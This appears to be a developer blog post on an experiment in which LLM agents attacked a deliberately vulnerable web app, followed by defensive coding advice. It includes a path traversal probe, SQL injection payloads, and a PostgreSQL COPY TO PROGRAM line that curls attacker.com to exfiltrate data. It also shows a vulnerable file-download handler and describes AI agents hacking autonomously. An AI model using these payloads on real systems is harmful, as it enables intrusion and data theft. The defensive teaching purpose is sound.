AI vs. AppSec: What I Learned Analyzing a $1,500 LLM Hacking Experiment

We’ve all seen the breathless marketing pitches: "AI is going to completely automate penetration testing!" or "Our LLM agent can find and patch every vulnerability in your codebase!" As developers, it’s easy to get cynical about these claims. We know how nuanced software security is. A bug isn't just a pattern in code; it’s often a logical flaw in how business rules interact.

But instead of just hand-waving the AI hype away, someone actually put it to a rigorous, expensive test. Recently, security researcher Johann Rehberger built a deliberately vulnerable web application and spent over $1,500 in LLM API fees (primarily using OpenAI's GPT-4o) to see if autonomous AI agents could actually hack it.

The results of this experiment are a goldmine for developers. They cut through the marketing fluff and show us exactly what LLM-based attackers are capable of today, where they fail badly, and, most importantly, how we need to adapt our defensive coding practices to survive the era of automated AI exploits. Let’s dive into the architecture of this experiment, look at some simulated exploit patterns, and unpack what this means for the future of application security.

The Setup: The Vulnerable Playground

To understand the LLM's performance, we first need to look at what it was up against. The target wasn't a simple, synthetic "Capture the Flag" (CTF) challenge with obvious flags hidden in text files. Instead, it was designed to mimic a modern, multi-tier enterprise application. The architecture looked something like this:


[ User / LLM Agent ] 
       │
       ▼ (React Frontend / API Calls)
[ FastAPI Gateway Service ] 
       │
       ├──► [ Microservice A: User Management ] ──► [ PostgreSQL ]
       │
       └──► [ Microservice B: Document Store ]  ──► [ Vector DB ]
                                                └──► [ AWS S3 Bucket ]

This application featured realistic business logic, including:

An authentication and authorization layer (JWT tokens, role-based access control).
An LLM-powered helper feature (introducing potential indirect prompt injection vectors).
A document upload and parsing system (vulnerable to path traversal and SSRF).
Standard database interactions (vulnerable to SQL injection under specific, non-obvious conditions).

To make the experiment realistic, the AI agent wasn't just given the source code. It was given an execution environment. The agent had access to a bash terminal, Python scripting capabilities, and HTTP clients, allowing it to interact with the target application dynamically, analyze responses, rewrite its payloads, and try again. This is what we call an "LLM Agent Loop."

Inside the Agent Loop: How the AI Attempts to Hack

How does an LLM actually go about attacking an application? It doesn't just run nmap and call it a day. It operates on a ReAct (Reasoning and Acting) framework. Here is a simplified representation of the agent's internal loop when encountering an API endpoint:


1. Thought: "The /api/v1/documents endpoint accepts a file_path parameter. This might be vulnerable to Directory Traversal."
2. Action: Use curl tool to send payload: ../../../etc/passwd
3. Observation: Server responds with "500 Internal Server Error - Path not allowed."
4. Thought: "The server is validating path separators. Let me try URL-encoding the traversal sequence (%2e%2e%2f) or using null bytes."
5. Action: Use curl tool with encoded payload.

This loop of Thought -> Action -> Observation -> Thought is incredibly powerful. Because the LLM has a massive context window and deep knowledge of security concepts, it can pivot its strategy based on the specific error messages your application returns.
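To make the loop concrete, here is a minimal sketch of its control flow in Python. This is not the code from the experiment: `run_agent_loop`, `scripted_policy`, and `fake_target` are hypothetical names, the "LLM" is a hard-coded stand-in, and the "tool" returns a canned response instead of touching the network.

```python
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple


@dataclass
class Step:
    thought: str
    action: str
    observation: str


def run_agent_loop(
    decide: Callable[[List[Step]], Tuple[str, Optional[str]]],
    act: Callable[[str], str],
    max_steps: int = 5,
) -> List[Step]:
    """Run Thought -> Action -> Observation until decide() returns no action."""
    history: List[Step] = []
    for _ in range(max_steps):
        thought, action = decide(history)  # Thought: plan from past observations
        if action is None:                 # the policy has run out of ideas
            break
        observation = act(action)          # Action, then Observation
        history.append(Step(thought, action, observation))
    return history


def scripted_policy(history: List[Step]) -> Tuple[str, Optional[str]]:
    # Hypothetical stand-in for the LLM call: reacts to the last observation.
    if not history:
        return ("file_path may allow directory traversal", "../../../etc/passwd")
    if len(history) == 1 and "Path not allowed" in history[-1].observation:
        return ("separators are filtered, try URL encoding",
                "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd")
    return ("no further ideas", None)


def fake_target(payload: str) -> str:
    # Hypothetical stand-in for the HTTP tool: canned response, no network.
    return "Path not allowed"


history = run_agent_loop(scripted_policy, fake_target)
for step in history:
    print(step.thought, "|", step.action, "|", step.observation)
```

The `max_steps` cap matters: without it, a policy that never gives up keeps looping and keeps spending API credits.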

Where the LLM Excelled: Low-Hanging Fruit and Scripting

The experiment revealed that LLMs are terrifyingly efficient at certain types of security tasks:

1. Rapid Reconnaissance and API Mapping

If your API has exposed Swagger/OpenAPI documentation or leaky error messages, the LLM will map your entire attack surface in seconds. It doesn't get tired, and it doesn't skip endpoints out of boredom. It can read through hundreds of pages of API documentation almost instantly and identify mismatched parameters.
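You can get a feel for how little effort this mapping takes by running it against your own spec. The sketch below walks an OpenAPI document that has already been loaded into a dict and lists every operation with its parameter names. The function name `list_operations` and the sample spec are my own illustration, reusing the two endpoints that appear elsewhere in this post.

```python
from typing import Dict, List, Tuple

HTTP_METHODS = {"get", "put", "post", "delete", "options", "head", "patch", "trace"}


def list_operations(spec: Dict) -> List[Tuple[str, str, List[str]]]:
    """Return (METHOD, path, parameter names) for each operation in an OpenAPI dict."""
    operations = []
    for path, item in spec.get("paths", {}).items():
        # Parameters declared on the path apply to all of its operations.
        shared = [p.get("name", "") for p in item.get("parameters", [])]
        for method, op in item.items():
            if method.lower() not in HTTP_METHODS:
                continue  # skip non-operation keys such as "parameters" or "summary"
            own = [p.get("name", "") for p in op.get("parameters", [])]
            operations.append((method.upper(), path, shared + own))
    return sorted(operations)


# Illustrative spec only, not the experiment's real API description.
spec = {
    "openapi": "3.0.0",
    "paths": {
        "/api/v1/documents": {
            "get": {"parameters": [{"name": "file_path", "in": "query"}]},
        },
        "/download": {
            "get": {"parameters": [{"name": "filename", "in": "query"}]},
        },
    },
}

for method, path, params in list_operations(spec):
    print(method, path, params)
```

If twenty lines of Python can enumerate your attack surface, assume an agent with a terminal can do the same.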

2. Exploiting Standard Injection Flaws

Consider a classic SQL injection vulnerability where input isn't properly parameterized. A human might take a few minutes to craft the perfect payload to bypass a web application firewall (WAF). An LLM can generate and test dozens of variations in seconds. For example, if a standard payload fails:

-- Standard payload
' UNION SELECT username, password FROM users --

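The LLM can quickly pivot to a database-specific technique if it detects the backend is PostgreSQL. The payload below stacks a second statement and abuses COPY ... TO PROGRAM, which only works if the application's database role is a superuser or is otherwise allowed to run server-side programs:

-- PostgreSQL-specific payload generated by agent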
'; COPY (SELECT database_to_xml(true,true,'')) TO PROGRAM 'curl http://attacker.com/exfil' --

3. Writing Custom Exploit Scripts on the Fly

If the agent discovered a multi-step vulnerability (e.g., register a user -> get a token -> use the token to exploit an IDOR, or insecure direct object reference, on a document endpoint -> exfiltrate data), it didn't do it manually. It wrote custom Python scripts using requests, executed them locally, read the output, and parsed the stolen data. This level of ad-hoc tool creation is something traditional vulnerability scanners simply cannot do.

Where the LLM Failed: The Cognitive Wall

Despite spending $1,500 and running thousands of iterations, the LLM agents hit a hard ceiling. They struggled significantly with three main areas:

1. Complex State and Multi-Step Business Logic

While the agent could easily script a two-step API exploit, it struggled with complex, stateful business logic. If an exploit required initiating a transaction, waiting for an asynchronous webhook, modifying a specific session state, and then triggering a race condition, the LLM's "context drift" became an issue. It would lose track of the ultimate goal, get stuck in repetitive loops, or hallucinate APIs that didn't exist.

2. Context Window Exhaustion and "State Loops"

This is where the $1,500 price tag comes from. As the hacking session progressed, the agent’s prompt history grew massive. It contained terminal outputs, API responses, and past failed attempts. Once the context window got cluttered, the LLM began to make silly mistakes. It would repeatedly try the exact same exploit payload that had failed ten steps earlier, burning through API credits without making progress.

3. Novel Vulnerability Discovery

LLMs are pattern matchers. They are incredible at finding variants of known vulnerabilities (SQLi, XSS, SSRF, path traversal). However, they struggle to reason beyond the patterns in their training data. If your application has a highly unique logical vulnerability born from proprietary business rules, the LLM is unlikely to discover it unless it closely resembles a publicly documented bug.

What This Means for Developers: Elevating Our Defensive Game

Some developers might look at the failures of these AI agents and think, "Great, our jobs are safe, and we don't need to worry about AI hackers yet."

That is the wrong takeaway.

What this experiment proves is that the cost of executing highly targeted, automated, and adaptive attacks has dropped sharply. While a human pentester might charge thousands of dollars for a few days of work, an attacker can run dozens of these LLM agent loops overnight for a fraction of the cost. Even if the AI only succeeds, say, 10% of the time on complex apps, that is a massive risk.

Here is how we, as developers, must adapt our defensive strategies:

1. Stop Relying on "Security through Obscurity"

If your security model relies on attackers not finding an unlinked API endpoint or not understanding your JSON payload structure, you are cooked. LLMs are too good at guessing, brute-forcing, and mapping interfaces. Every single endpoint must be secured under the assumption that its schema, parameters, and authentication requirements are completely public.
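In practice, "assume everything is public" means every handler checks who is asking, not just whether they know the right ID. Here is a minimal, framework-free sketch of an object-level authorization check. The `User`, `Document`, `Forbidden`, and `authorize_read` names and the "admin" role are assumptions for illustration, not part of the experiment's application.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    user_id: int
    role: str


@dataclass(frozen=True)
class Document:
    doc_id: int
    owner_id: int


class Forbidden(Exception):
    """Raised when the caller may not access the requested object."""


def authorize_read(user: User, doc: Document) -> None:
    # Deny by default: knowing (or guessing) doc_id grants nothing on its own.
    if user.role == "admin" or doc.owner_id == user.user_id:
        return
    raise Forbidden(f"user {user.user_id} may not read document {doc.doc_id}")


doc = Document(doc_id=10, owner_id=1)
authorize_read(User(user_id=1, role="member"), doc)  # owner: passes silently
try:
    authorize_read(User(user_id=2, role="member"), doc)
except Forbidden as exc:
    print("blocked:", exc)
```

Calling a check like this at the top of every handler that loads an object by ID is what turns a guessed identifier into a harmless 403.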

2. Tighten Your Input Validation and Parameterization

Because LLMs can generate infinite variations of injection payloads to bypass simple regex filters, you must use robust, structural defenses.

Use parameterized queries (ORMs or prepared statements) exclusively.
Use strict allow-list validation for file paths and system commands.
Never construct system paths using raw string concatenation.

For example, if you are handling file downloads, do not do this:

# VULNERABLE: Easy prey for an LLM agent
@app.get("/download")
def download_file(filename: str):
    return FileResponse(path=f"/var/www/uploads/{filename}")

Instead, use path resolution and validation to ensure the requested file cannot escape the intended directory:

# SECURE: Safe from path traversal attacks
from pathlib import Path

from fastapi import FastAPI, HTTPException, status
from fastapi.responses import FileResponse

app = FastAPI()

UPLOAD_DIR = Path("/var/www/uploads").resolve()

@app.get("/download")
def download_file(filename: str):
    # Resolve the absolute path
    target_path = (UPLOAD_DIR / filename).resolve()
    
    # Prevent Directory Traversal (ensure the target is inside the upload directory)
    # Note: Path.is_relative_to() requires Python 3.9+
    if not target_path.is_relative_to(UPLOAD_DIR):
        raise HTTPException(
            status_code=status.HTTP_403_FORBIDDEN, 
            detail="Access denied"
        )
        
    if not target_path.is_file():
        raise HTTPException(
            status_code=status.HTTP_404_NOT_FOUND, 
            detail="File not found"
        )
        
    return FileResponse(path=target_path)
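The same structural thinking applies to the parameterized-query rule from the list above. The sketch below uses Python's built-in sqlite3 module with an in-memory database so it runs anywhere. That is my substitution for the PostgreSQL backend in the experiment, and the table, the sample row, and the function names are made up for the demo. It feeds the UNION payload from earlier in this post to a string-built query and to a parameterized one.

```python
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    # Throwaway in-memory database with one made-up user.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'hunter2')")
    return conn


def find_user_unsafe(conn: sqlite3.Connection, name: str):
    # VULNERABLE: the input becomes part of the SQL text itself.
    query = f"SELECT username FROM users WHERE username = '{name}'"
    return conn.execute(query).fetchall()


def find_user_safe(conn: sqlite3.Connection, name: str):
    # The ? placeholder passes the input as data, never as SQL.
    return conn.execute(
        "SELECT username FROM users WHERE username = ?", (name,)
    ).fetchall()


conn = make_demo_db()
payload = "' UNION SELECT password FROM users --"
print("unsafe:", find_user_unsafe(conn, payload))  # leaks the password column
print("safe:  ", find_user_safe(conn, payload))    # no user has that name
```

Placeholder syntax varies by driver (sqlite3 uses `?`, while PostgreSQL drivers such as psycopg use `%s`), but the principle is identical: the query text is fixed, and user input only ever travels as a bound value.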

3. Rate-Limit and Monitor Your APIs

The LLM agent in this experiment made thousands of rapid-fire requests, tweaking payloads by a few characters each time. If your production environment does not have rate-limiting, anomaly detection, and IP blocking, an AI agent can brute-force its way through subtle logical vulnerabilities without you realizing it. Implement robust rate-limiting at your API gateway level to shut down these high-frequency, automated probing behaviors.
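To show the idea, here is a minimal sliding-window rate limiter in plain Python. Treat it as a sketch under assumptions: the class name, the limits, and the choice of client identifier are mine, and it keeps state in process memory, so a real deployment would more likely rely on the API gateway's built-in limiter or a shared store.

```python
import time
from collections import defaultdict, deque
from typing import Callable, Deque, Dict


class SlidingWindowLimiter:
    """Allow at most max_requests per client within any window_seconds span."""

    def __init__(
        self,
        max_requests: int,
        window_seconds: float,
        clock: Callable[[], float] = time.monotonic,
    ) -> None:
        self.max_requests = max_requests
        self.window_seconds = window_seconds
        self.clock = clock  # injectable so the limiter can be tested without sleeping
        self._hits: Dict[str, Deque[float]] = defaultdict(deque)

    def allow(self, client_id: str) -> bool:
        now = self.clock()
        hits = self._hits[client_id]
        # Drop timestamps that have aged out of the window.
        while hits and now - hits[0] >= self.window_seconds:
            hits.popleft()
        if len(hits) >= self.max_requests:
            return False  # over the limit: the caller should respond with HTTP 429
        hits.append(now)
        return True


limiter = SlidingWindowLimiter(max_requests=3, window_seconds=10.0)
print([limiter.allow("203.0.113.7") for _ in range(5)])
```

Keying on IP address alone is easy for an attacker to rotate around, so combining it with the authenticated user or API key is usually the safer choice.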

Conclusion: The New Era of AppSec

Johann Rehberger's $1,500 experiment is a fascinating glimpse into the future of security. LLMs aren't magic; they get confused by complex state, they run into context limits, and they can be expensive to run continuously. But they are also highly capable and tireless, and they can write custom code on the fly to exploit the vulnerabilities we leave behind.

As developers, our code is now being audited by machines that don't sleep. The best defense is to write clean, parameterized, and well-validated code, and to treat security not as an afterthought, but as a core architectural requirement.

What are your thoughts? Have you started using LLM tools to audit your own codebases? Have you seen AI agents find bugs that your traditional SAST tools missed? Let’s talk about it in the comments below!

Until next time, happy coding! — Alex